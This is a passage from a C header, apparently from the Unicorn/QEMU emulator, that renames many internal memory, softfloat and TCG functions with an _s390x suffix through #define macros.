qemu_target_page_bits_s390x #define qemu_target_page_bits_min qemu_target_page_bits_min_s390x #define target_words_bigendian target_words_bigendian_s390x #define cpu_physical_memory_is_io cpu_physical_memory_is_io_s390x #define ram_block_discard_range ram_block_discard_range_s390x #define ramblock_is_pmem ramblock_is_pmem_s390x #define page_size_init page_size_init_s390x #define set_preferred_target_page_bits set_preferred_target_page_bits_s390x #define finalize_target_page_bits finalize_target_page_bits_s390x #define cpu_outb cpu_outb_s390x #define cpu_outw cpu_outw_s390x #define cpu_outl cpu_outl_s390x #define cpu_inb cpu_inb_s390x #define cpu_inw cpu_inw_s390x #define cpu_inl cpu_inl_s390x #define memory_map memory_map_s390x #define memory_map_io memory_map_io_s390x #define memory_map_ptr memory_map_ptr_s390x #define memory_cow memory_cow_s390x #define memory_unmap memory_unmap_s390x #define memory_moveout memory_moveout_s390x #define memory_movein memory_movein_s390x #define memory_free memory_free_s390x #define flatview_unref flatview_unref_s390x #define address_space_get_flatview address_space_get_flatview_s390x #define memory_region_transaction_begin memory_region_transaction_begin_s390x #define memory_region_transaction_commit memory_region_transaction_commit_s390x #define memory_region_init memory_region_init_s390x #define memory_region_access_valid memory_region_access_valid_s390x #define memory_region_dispatch_read memory_region_dispatch_read_s390x #define memory_region_dispatch_write memory_region_dispatch_write_s390x #define memory_region_init_io memory_region_init_io_s390x #define memory_region_init_ram_ptr memory_region_init_ram_ptr_s390x #define memory_region_size memory_region_size_s390x #define memory_region_set_readonly memory_region_set_readonly_s390x #define memory_region_get_ram_ptr memory_region_get_ram_ptr_s390x #define memory_region_from_host memory_region_from_host_s390x #define memory_region_get_ram_addr memory_region_get_ram_addr_s390x #define memory_region_add_subregion memory_region_add_subregion_s390x #define memory_region_del_subregion memory_region_del_subregion_s390x #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_s390x #define memory_region_find memory_region_find_s390x #define memory_region_filter_subregions memory_region_filter_subregions_s390x #define memory_listener_register memory_listener_register_s390x #define memory_listener_unregister memory_listener_unregister_s390x #define address_space_remove_listeners address_space_remove_listeners_s390x #define address_space_init address_space_init_s390x #define address_space_destroy address_space_destroy_s390x #define memory_region_init_ram memory_region_init_ram_s390x #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_s390x #define find_memory_mapping find_memory_mapping_s390x #define exec_inline_op exec_inline_op_s390x #define floatx80_default_nan floatx80_default_nan_s390x #define float_raise float_raise_s390x #define float16_is_quiet_nan float16_is_quiet_nan_s390x #define float16_is_signaling_nan float16_is_signaling_nan_s390x #define float32_is_quiet_nan float32_is_quiet_nan_s390x #define float32_is_signaling_nan float32_is_signaling_nan_s390x #define float64_is_quiet_nan float64_is_quiet_nan_s390x #define float64_is_signaling_nan float64_is_signaling_nan_s390x #define floatx80_is_quiet_nan floatx80_is_quiet_nan_s390x #define floatx80_is_signaling_nan floatx80_is_signaling_nan_s390x #define floatx80_silence_nan floatx80_silence_nan_s390x #define propagateFloatx80NaN propagateFloatx80NaN_s390x #define float128_is_quiet_nan float128_is_quiet_nan_s390x #define float128_is_signaling_nan float128_is_signaling_nan_s390x #define float128_silence_nan float128_silence_nan_s390x #define float16_add float16_add_s390x #define float16_sub float16_sub_s390x #define float32_add float32_add_s390x #define float32_sub float32_sub_s390x #define float64_add float64_add_s390x #define float64_sub float64_sub_s390x #define float16_mul float16_mul_s390x #define float32_mul float32_mul_s390x #define float64_mul float64_mul_s390x #define float16_muladd float16_muladd_s390x #define float32_muladd float32_muladd_s390x #define float64_muladd float64_muladd_s390x #define float16_div float16_div_s390x #define float32_div float32_div_s390x #define float64_div float64_div_s390x #define float16_to_float32 float16_to_float32_s390x #define float16_to_float64 float16_to_float64_s390x #define float32_to_float16 float32_to_float16_s390x #define float32_to_float64 float32_to_float64_s390x #define float64_to_float16 float64_to_float16_s390x #define float64_to_float32 float64_to_float32_s390x #define float16_round_to_int float16_round_to_int_s390x #define float32_round_to_int float32_round_to_int_s390x #define float64_round_to_int float64_round_to_int_s390x #define float16_to_int16_scalbn float16_to_int16_scalbn_s390x #define float16_to_int32_scalbn float16_to_int32_scalbn_s390x #define float16_to_int64_scalbn float16_to_int64_scalbn_s390x #define float32_to_int16_scalbn float32_to_int16_scalbn_s390x #define float32_to_int32_scalbn float32_to_int32_scalbn_s390x #define float32_to_int64_scalbn float32_to_int64_scalbn_s390x #define float64_to_int16_scalbn float64_to_int16_scalbn_s390x #define float64_to_int32_scalbn float64_to_int32_scalbn_s390x #define float64_to_int64_scalbn float64_to_int64_scalbn_s390x #define float16_to_int16 float16_to_int16_s390x #define float16_to_int32 float16_to_int32_s390x #define float16_to_int64 float16_to_int64_s390x #define float32_to_int16 float32_to_int16_s390x #define float32_to_int32 float32_to_int32_s390x #define float32_to_int64 float32_to_int64_s390x #define float64_to_int16 float64_to_int16_s390x #define float64_to_int32 float64_to_int32_s390x #define float64_to_int64 float64_to_int64_s390x #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_s390x #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_s390x #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_s390x #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_s390x #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_s390x #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_s390x #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_s390x #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_s390x #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_s390x #define float16_to_uint16_scalbn float16_to_uint16_scalbn_s390x #define float16_to_uint32_scalbn float16_to_uint32_scalbn_s390x #define float16_to_uint64_scalbn float16_to_uint64_scalbn_s390x #define float32_to_uint16_scalbn float32_to_uint16_scalbn_s390x #define float32_to_uint32_scalbn float32_to_uint32_scalbn_s390x #define float32_to_uint64_scalbn float32_to_uint64_scalbn_s390x #define float64_to_uint16_scalbn float64_to_uint16_scalbn_s390x #define float64_to_uint32_scalbn float64_to_uint32_scalbn_s390x #define float64_to_uint64_scalbn float64_to_uint64_scalbn_s390x #define float16_to_uint16 float16_to_uint16_s390x #define float16_to_uint32 float16_to_uint32_s390x #define float16_to_uint64 float16_to_uint64_s390x #define float32_to_uint16 float32_to_uint16_s390x #define float32_to_uint32 float32_to_uint32_s390x #define float32_to_uint64 float32_to_uint64_s390x #define float64_to_uint16 float64_to_uint16_s390x #define float64_to_uint32 float64_to_uint32_s390x #define float64_to_uint64 float64_to_uint64_s390x #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_s390x #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_s390x #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_s390x #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_s390x #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_s390x #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_s390x #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_s390x #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_s390x #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_s390x #define int64_to_float16_scalbn int64_to_float16_scalbn_s390x #define int32_to_float16_scalbn int32_to_float16_scalbn_s390x #define int16_to_float16_scalbn int16_to_float16_scalbn_s390x #define int64_to_float16 int64_to_float16_s390x #define int32_to_float16 int32_to_float16_s390x #define int16_to_float16 int16_to_float16_s390x #define int64_to_float32_scalbn int64_to_float32_scalbn_s390x #define int32_to_float32_scalbn int32_to_float32_scalbn_s390x #define int16_to_float32_scalbn int16_to_float32_scalbn_s390x #define int64_to_float32 int64_to_float32_s390x #define int32_to_float32 int32_to_float32_s390x #define int16_to_float32 int16_to_float32_s390x #define int64_to_float64_scalbn int64_to_float64_scalbn_s390x #define int32_to_float64_scalbn int32_to_float64_scalbn_s390x #define int16_to_float64_scalbn int16_to_float64_scalbn_s390x #define int64_to_float64 int64_to_float64_s390x #define int32_to_float64 int32_to_float64_s390x #define int16_to_float64 int16_to_float64_s390x #define uint64_to_float16_scalbn uint64_to_float16_scalbn_s390x #define uint32_to_float16_scalbn uint32_to_float16_scalbn_s390x #define uint16_to_float16_scalbn uint16_to_float16_scalbn_s390x #define uint64_to_float16 uint64_to_float16_s390x #define uint32_to_float16 uint32_to_float16_s390x #define uint16_to_float16 uint16_to_float16_s390x #define uint64_to_float32_scalbn uint64_to_float32_scalbn_s390x #define uint32_to_float32_scalbn uint32_to_float32_scalbn_s390x #define uint16_to_float32_scalbn uint16_to_float32_scalbn_s390x #define uint64_to_float32 uint64_to_float32_s390x #define uint32_to_float32 uint32_to_float32_s390x #define uint16_to_float32 uint16_to_float32_s390x #define uint64_to_float64_scalbn uint64_to_float64_scalbn_s390x #define uint32_to_float64_scalbn uint32_to_float64_scalbn_s390x #define uint16_to_float64_scalbn uint16_to_float64_scalbn_s390x #define uint64_to_float64 uint64_to_float64_s390x #define uint32_to_float64 uint32_to_float64_s390x #define uint16_to_float64 uint16_to_float64_s390x #define float16_min float16_min_s390x #define float16_minnum float16_minnum_s390x #define float16_minnummag float16_minnummag_s390x #define float16_max float16_max_s390x #define float16_maxnum float16_maxnum_s390x #define float16_maxnummag float16_maxnummag_s390x #define float32_min float32_min_s390x #define float32_minnum float32_minnum_s390x #define float32_minnummag float32_minnummag_s390x #define float32_max float32_max_s390x #define float32_maxnum float32_maxnum_s390x #define float32_maxnummag float32_maxnummag_s390x #define float64_min float64_min_s390x #define float64_minnum float64_minnum_s390x #define float64_minnummag float64_minnummag_s390x #define float64_max float64_max_s390x #define float64_maxnum float64_maxnum_s390x #define float64_maxnummag float64_maxnummag_s390x #define float16_compare float16_compare_s390x #define float16_compare_quiet float16_compare_quiet_s390x #define float32_compare float32_compare_s390x #define float32_compare_quiet float32_compare_quiet_s390x #define float64_compare float64_compare_s390x #define float64_compare_quiet float64_compare_quiet_s390x #define float16_scalbn float16_scalbn_s390x #define float32_scalbn float32_scalbn_s390x #define float64_scalbn float64_scalbn_s390x #define float16_sqrt float16_sqrt_s390x #define float32_sqrt float32_sqrt_s390x #define float64_sqrt float64_sqrt_s390x #define float16_default_nan float16_default_nan_s390x #define float32_default_nan float32_default_nan_s390x #define float64_default_nan float64_default_nan_s390x #define float128_default_nan float128_default_nan_s390x #define float16_silence_nan float16_silence_nan_s390x #define float32_silence_nan float32_silence_nan_s390x #define float64_silence_nan float64_silence_nan_s390x #define float16_squash_input_denormal float16_squash_input_denormal_s390x #define float32_squash_input_denormal float32_squash_input_denormal_s390x #define float64_squash_input_denormal float64_squash_input_denormal_s390x #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_s390x #define roundAndPackFloatx80 roundAndPackFloatx80_s390x #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_s390x #define int32_to_floatx80 int32_to_floatx80_s390x #define int32_to_float128 int32_to_float128_s390x #define int64_to_floatx80 int64_to_floatx80_s390x #define int64_to_float128 int64_to_float128_s390x #define uint64_to_float128 uint64_to_float128_s390x #define float32_to_floatx80 float32_to_floatx80_s390x #define float32_to_float128 float32_to_float128_s390x #define float32_rem float32_rem_s390x #define float32_exp2 float32_exp2_s390x #define float32_log2 float32_log2_s390x #define float32_eq float32_eq_s390x #define float32_le float32_le_s390x #define float32_lt float32_lt_s390x #define float32_unordered float32_unordered_s390x #define float32_eq_quiet float32_eq_quiet_s390x #define float32_le_quiet float32_le_quiet_s390x #define float32_lt_quiet float32_lt_quiet_s390x #define float32_unordered_quiet float32_unordered_quiet_s390x #define float64_to_floatx80 float64_to_floatx80_s390x #define float64_to_float128 float64_to_float128_s390x #define float64_rem float64_rem_s390x #define float64_log2 float64_log2_s390x #define float64_eq float64_eq_s390x #define float64_le float64_le_s390x #define float64_lt float64_lt_s390x #define float64_unordered float64_unordered_s390x #define float64_eq_quiet float64_eq_quiet_s390x #define float64_le_quiet float64_le_quiet_s390x #define float64_lt_quiet float64_lt_quiet_s390x #define float64_unordered_quiet float64_unordered_quiet_s390x #define floatx80_to_int32 floatx80_to_int32_s390x #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_s390x #define floatx80_to_int64 floatx80_to_int64_s390x #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_s390x #define floatx80_to_float32 floatx80_to_float32_s390x #define floatx80_to_float64 floatx80_to_float64_s390x #define floatx80_to_float128 floatx80_to_float128_s390x #define floatx80_round floatx80_round_s390x #define floatx80_round_to_int floatx80_round_to_int_s390x #define floatx80_add floatx80_add_s390x #define floatx80_sub floatx80_sub_s390x #define floatx80_mul floatx80_mul_s390x #define floatx80_div floatx80_div_s390x #define floatx80_rem floatx80_rem_s390x #define floatx80_sqrt floatx80_sqrt_s390x #define floatx80_eq floatx80_eq_s390x #define floatx80_le floatx80_le_s390x #define floatx80_lt floatx80_lt_s390x #define floatx80_unordered floatx80_unordered_s390x #define floatx80_eq_quiet floatx80_eq_quiet_s390x #define floatx80_le_quiet floatx80_le_quiet_s390x #define floatx80_lt_quiet floatx80_lt_quiet_s390x #define floatx80_unordered_quiet floatx80_unordered_quiet_s390x #define float128_to_int32 float128_to_int32_s390x #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_s390x #define float128_to_int64 float128_to_int64_s390x #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_s390x #define float128_to_uint64 float128_to_uint64_s390x #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_s390x #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_s390x #define float128_to_uint32 float128_to_uint32_s390x #define float128_to_float32 float128_to_float32_s390x #define float128_to_float64 float128_to_float64_s390x #define float128_to_floatx80 float128_to_floatx80_s390x #define float128_round_to_int float128_round_to_int_s390x #define float128_add float128_add_s390x #define float128_sub float128_sub_s390x #define float128_mul float128_mul_s390x #define float128_div float128_div_s390x #define float128_rem float128_rem_s390x #define float128_sqrt float128_sqrt_s390x #define float128_eq float128_eq_s390x #define float128_le float128_le_s390x #define float128_lt float128_lt_s390x #define float128_unordered float128_unordered_s390x #define float128_eq_quiet float128_eq_quiet_s390x #define float128_le_quiet float128_le_quiet_s390x #define float128_lt_quiet float128_lt_quiet_s390x #define float128_unordered_quiet float128_unordered_quiet_s390x #define floatx80_compare floatx80_compare_s390x #define floatx80_compare_quiet floatx80_compare_quiet_s390x #define float128_compare float128_compare_s390x #define float128_compare_quiet float128_compare_quiet_s390x #define floatx80_scalbn floatx80_scalbn_s390x #define float128_scalbn float128_scalbn_s390x #define softfloat_init softfloat_init_s390x #define tcg_optimize tcg_optimize_s390x #define gen_new_label gen_new_label_s390x #define tcg_can_emit_vec_op tcg_can_emit_vec_op_s390x #define tcg_expand_vec_op tcg_expand_vec_op_s390x #define tcg_register_jit tcg_register_jit_s390x #define tcg_tb_insert tcg_tb_insert_s390x #define tcg_tb_remove tcg_tb_remove_s390x #define tcg_tb_lookup tcg_tb_lookup_s390x #define tcg_tb_foreach tcg_tb_foreach_s390x #define tcg_nb_tbs tcg_nb_tbs_s390x #define tcg_region_reset_all tcg_region_reset_all_s390x #define tcg_region_init tcg_region_init_s390x #define tcg_code_size tcg_code_size_s390x #define tcg_code_capacity tcg_code_capacity_s390x #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_s390x #define tcg_malloc_internal tcg_malloc_internal_s390x #define tcg_pool_reset tcg_pool_reset_s390x #define tcg_context_init tcg_context_init_s390x #define tcg_tb_alloc tcg_tb_alloc_s390x #define tcg_prologue_init tcg_prologue_init_s390x #define tcg_func_start tcg_func_start_s390x #define tcg_set_frame tcg_set_frame_s390x #define tcg_global_mem_new_internal tcg_global_mem_new_internal_s390x #define tcg_temp_new_internal tcg_temp_new_internal_s390x #define tcg_temp_new_vec tcg_temp_new_vec_s390x #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_s390x #define tcg_temp_free_internal tcg_temp_free_internal_s390x #define tcg_const_i32 tcg_const_i32_s390x #define tcg_const_i64 tcg_const_i64_s390x #define tcg_const_local_i32 tcg_const_local_i32_s390x #define tcg_const_local_i64 tcg_const_local_i64_s390x #define tcg_op_supported tcg_op_supported_s390x #define tcg_gen_callN tcg_gen_callN_s390x #define tcg_op_remove tcg_op_remove_s390x #define tcg_emit_op tcg_emit_op_s390x #define tcg_op_insert_before tcg_op_insert_before_s390x #define tcg_op_insert_after tcg_op_insert_after_s390x #define tcg_cpu_exec_time tcg_cpu_exec_time_s390x #define tcg_gen_code tcg_gen_code_s390x #define tcg_gen_op1 tcg_gen_op1_s390x #define tcg_gen_op2 tcg_gen_op2_s390x #define tcg_gen_op3 tcg_gen_op3_s390x #define tcg_gen_op4 tcg_gen_op4_s390x #define tcg_gen_op5 tcg_gen_op5_s390x #define tcg_gen_op6 tcg_gen_op6_s390x #define tcg_gen_mb tcg_gen_mb_s390x #define tcg_gen_addi_i32 tcg_gen_addi_i32_s390x #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_s390x #define tcg_gen_subi_i32 tcg_gen_subi_i32_s390x #define tcg_gen_andi_i32 tcg_gen_andi_i32_s390x #define tcg_gen_ori_i32 tcg_gen_ori_i32_s390x #define tcg_gen_xori_i32 tcg_gen_xori_i32_s390x #define tcg_gen_shli_i32 tcg_gen_shli_i32_s390x #define tcg_gen_shri_i32 tcg_gen_shri_i32_s390x #define tcg_gen_sari_i32 tcg_gen_sari_i32_s390x #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_s390x #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_s390x #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_s390x #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_s390x #define tcg_gen_muli_i32 tcg_gen_muli_i32_s390x #define tcg_gen_div_i32 tcg_gen_div_i32_s390x #define tcg_gen_rem_i32 tcg_gen_rem_i32_s390x #define tcg_gen_divu_i32 tcg_gen_divu_i32_s390x #define tcg_gen_remu_i32 tcg_gen_remu_i32_s390x #define tcg_gen_andc_i32 tcg_gen_andc_i32_s390x #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_s390x #define tcg_gen_nand_i32 tcg_gen_nand_i32_s390x #define tcg_gen_nor_i32 tcg_gen_nor_i32_s390x #define tcg_gen_orc_i32 tcg_gen_orc_i32_s390x #define tcg_gen_clz_i32 tcg_gen_clz_i32_s390x #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_s390x #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_s390x #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_s390x #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_s390x #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_s390x #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_s390x #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_s390x #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_s390x #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_s390x #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_s390x #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_s390x #define tcg_gen_extract_i32 tcg_gen_extract_i32_s390x #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_s390x #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_s390x #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_s390x #define tcg_gen_add2_i32 tcg_gen_add2_i32_s390x #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_s390x #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_s390x #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_s390x #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_s390x #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_s390x #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_s390x #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_s390x #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_s390x #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_s390x #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_s390x #define tcg_gen_smin_i32 tcg_gen_smin_i32_s390x #define tcg_gen_umin_i32 tcg_gen_umin_i32_s390x #define tcg_gen_smax_i32 tcg_gen_smax_i32_s390x #define tcg_gen_umax_i32 tcg_gen_umax_i32_s390x #define tcg_gen_abs_i32 tcg_gen_abs_i32_s390x #define tcg_gen_addi_i64 tcg_gen_addi_i64_s390x #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_s390x #define tcg_gen_subi_i64 tcg_gen_subi_i64_s390x #define tcg_gen_andi_i64 tcg_gen_andi_i64_s390x #define tcg_gen_ori_i64 tcg_gen_ori_i64_s390x #define tcg_gen_xori_i64 tcg_gen_xori_i64_s390x #define tcg_gen_shli_i64 tcg_gen_shli_i64_s390x #define tcg_gen_shri_i64 tcg_gen_shri_i64_s390x #define tcg_gen_sari_i64 tcg_gen_sari_i64_s390x #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_s390x #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_s390x #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_s390x #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_s390x #define tcg_gen_muli_i64 tcg_gen_muli_i64_s390x #define tcg_gen_div_i64 tcg_gen_div_i64_s390x #define tcg_gen_rem_i64 tcg_gen_rem_i64_s390x #define tcg_gen_divu_i64 tcg_gen_divu_i64_s390x #define tcg_gen_remu_i64 tcg_gen_remu_i64_s390x #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_s390x #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_s390x #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_s390x #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_s390x #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_s390x #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_s390x #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_s390x #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_s390x #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_s390x #define tcg_gen_not_i64 tcg_gen_not_i64_s390x #define tcg_gen_andc_i64 tcg_gen_andc_i64_s390x #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_s390x #define tcg_gen_nand_i64 tcg_gen_nand_i64_s390x #define tcg_gen_nor_i64 tcg_gen_nor_i64_s390x #define tcg_gen_orc_i64 tcg_gen_orc_i64_s390x #define tcg_gen_clz_i64 tcg_gen_clz_i64_s390x #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_s390x #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_s390x #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_s390x #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_s390x #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_s390x #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_s390x #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_s390x #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_s390x #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_s390x #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_s390x #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_s390x #define tcg_gen_extract_i64 tcg_gen_extract_i64_s390x #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_s390x #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_s390x #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_s390x #define tcg_gen_add2_i64 tcg_gen_add2_i64_s390x #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_s390x #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_s390x #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_s390x #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_s390x #define tcg_gen_smin_i64 tcg_gen_smin_i64_s390x #define tcg_gen_umin_i64 tcg_gen_umin_i64_s390x #define tcg_gen_smax_i64 tcg_gen_smax_i64_s390x #define tcg_gen_umax_i64 tcg_gen_umax_i64_s390x #define tcg_gen_abs_i64 tcg_gen_abs_i64_s390x #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_s390x #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_s390x #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_s390x #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_s390x #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_s390x #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_s390x #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_s390x #define tcg_gen_exit_tb tcg_gen_exit_tb_s390x #define tcg_gen_goto_tb tcg_gen_goto_tb_s390x #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_s390x #define check_exit_request check_exit_request_s390x #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_s390x #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_s390x #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_s390x #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_s390x #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_s390x #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_s390x #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_s390x #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_s390x #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_s390x #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_s390x #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_s390x #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_s390x #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_s390x #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_s390x #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_s390x #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_s390x #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_s390x #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_s390x #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_s390x #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_s390x #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_s390x #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_s390x #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_s390x #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_s390x #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_s390x #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_s390x #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_s390x #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_s390x #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_s390x #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_s390x #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_s390x #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_s390x #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_s390x #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_s390x #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_s390x #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_s390x #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_s390x #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_s390x #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_s390x #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_s390x #define simd_desc simd_desc_s390x #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_s390x #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_s390x #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_s390x #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_s390x #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_s390x #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_s390x #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_s390x #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_s390x #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_s390x #define tcg_gen_gvec_2 tcg_gen_gvec_2_s390x #define tcg_gen_gvec_2i tcg_gen_gvec_2i_s390x #define tcg_gen_gvec_2s tcg_gen_gvec_2s_s390x #define tcg_gen_gvec_3 tcg_gen_gvec_3_s390x #define tcg_gen_gvec_3i tcg_gen_gvec_3i_s390x #define tcg_gen_gvec_4 tcg_gen_gvec_4_s390x #define tcg_gen_gvec_mov tcg_gen_gvec_mov_s390x #define tcg_gen_gvec_dup_i32 